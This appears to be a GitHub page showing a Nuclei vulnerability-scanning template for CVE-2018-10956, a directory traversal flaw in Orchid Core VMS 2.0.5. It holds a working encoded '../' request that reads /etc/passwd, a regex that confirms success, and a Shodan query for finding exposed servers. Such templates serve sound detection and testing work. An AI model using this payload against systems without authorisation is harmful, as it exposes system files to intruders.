-
Notifications
You must be signed in to change notification settings - Fork 221
/
CVE-2018-10956.yaml
39 lines (34 loc) · 1.15 KB
/
CVE-2018-10956.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
id: CVE-2018-10956
info:
name: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.
reference:
- https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/
- https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb
- https://www.cvedetails.com/cve/CVE-2018-10956
- https://www.exploit-db.com/exploits/44916/
- https://nvd.nist.gov/vuln/detail/CVE-2018-10956
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-10956
cwe-id: CWE-22
metadata:
shodan-query: http.title:"Orchid Core VMS"
tags: cve,cve2018,orchid,vms,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/19